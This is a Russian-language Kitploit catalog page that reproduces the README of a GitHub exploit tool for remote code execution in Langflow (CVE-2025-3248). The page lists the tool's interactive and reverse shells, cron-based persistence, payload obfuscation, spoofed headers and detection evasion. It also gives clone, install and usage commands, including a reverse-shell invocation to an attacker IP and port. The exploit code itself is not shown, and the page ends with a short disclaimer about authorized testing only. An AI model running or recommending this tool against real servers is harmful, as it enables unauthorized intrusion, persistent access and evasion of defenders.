Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
langflow-rce-exploit — Эксплойт удаленного выполнения кода для Langflow (CVE-2025-3248) - [ от S4Tech ] | Kitploit
Инструменты/GitHubGitHub/0-d3y/langflow-rce-exploit
Повышение привилегийМеханизмы персистентностиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
711 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
0-d3y/langflow-rce-exploit

langflow-rce-exploit

Эксплойт удаленного выполнения кода для Langflow (CVE-2025-3248) - [ от S4Tech ]

Репозиторий

Langflow RCE Exploit (CVE-2025-3248)

Python Version License Platform

Эксплойт удалённого выполнения кода для Langflow (CVE-2025-3248)

Возможности

  • Автоматическое обнаружение уязвимости
  • Несколько режимов эксплуатации:
    • Интерактивная оболочка
    • Выполнение одиночной команды
    • Подключение обратной оболочки
  • Возможность загрузки файлов
  • Цветной пользовательский интерфейс
  • Несколько методов обратной оболочки
  • Сохранение истории команд

📌 Список изменений (v2.0)

✨ Новые функции:

  • Расширенная система полезных нагрузок с 5 методами выполнения
  • Загрузка/выгрузка файлов с кодировкой Base64
  • Постоянство через cron-задачи (команда persist)
  • Улучшения интерактивной оболочки:
    • upload local_path remote_path
    • download remote_path local_path
    • Команда clear для очистки терминала

🛡️ Улучшения безопасности:

  • Автоматическое запутывание полезных нагрузок (Base64 + случайные варианты)
  • Смена заголовков при каждом запросе:
    • Случайный User-Agent
    • Поддельные IP-адреса X-Forwarded-For
  • Обход HTTPS (поддержка самоподписанных сертификатов)
  • Отсутствие перенаправлений для предотвращения обнаружения

⚡ Технические улучшения:

  • Многоэтапная проверка уязвимости
  • Улучшенная обработка ошибок для нестабильных соединений
  • Полное журналирование сессий в exploit_log.txt
  • Сохранение истории команд (.langflow_shell_history)

📊 Сравнение версий:

🐛 Исправления ошибок:

  • Исправлены проблемы с HTTPS-соединениями
  • Улучшена обработка специальных символов в командах
  • Стабилизирована надёжность обратной оболочки

Требования

  • Python 3.6 или новее
  • Требуемые библиотеки:
    • requests
    • colorama
    • readline

Установка

root@kitploit:~
git clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt

Использование

root@kitploit:~
python exploit.py <URL> [options]

Доступные опции:

Примеры:

  1. Проверка уязвимости:
root@kitploit:~
python exploit.py http://target.com
  1. Запуск интерактивной оболочки:
root@kitploit:~
python exploit.py http://target.com --shell
  1. Выполнение одиночной команды:
root@kitploit:~
python exploit.py http://target.com --command "whoami"
  1. Запуск обратной оболочки:
root@kitploit:~
python exploit.py http://target.com --reverse 192.168.1.100 4444

Скриншоты

Изображение.png)

Предупреждение

⚠️ Этот инструмент предназначен только для образовательного и авторизованного тестирования.
⚠️ Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет разрешения, является незаконным.

Лицензия

Этот проект лицензирован по лицензии MIT — подробнее см. в файле LICENSE.

Автор

  • Mr.SaMi
    Twitter
    Instagram

Вклад

Приветствуются pull-реквесты. Для серьёзных изменений сначала откройте issue, чтобы обсудить, что вы хотели бы изменить.

Скачать инструмент
Функцияv1.0v2.0
Методы полезных нагрузок15
Передача файлов❌ Не поддерживается✅ Поддерживается
Постоянство❌✅
Уровень скрытностиБазовыйПродвинутый
Журналирование сессий❌✅
ОпцияОписание
--shellЗапустить интерактивную оболочку
--reverse IP PORTЗапустить обратную оболочку на указанный IP:PORT
--command CMDВыполнить одну команду
--verboseВключить подробный вывод
--timeout SECУстановить тайм-аут запроса (по умолчанию: 10 с)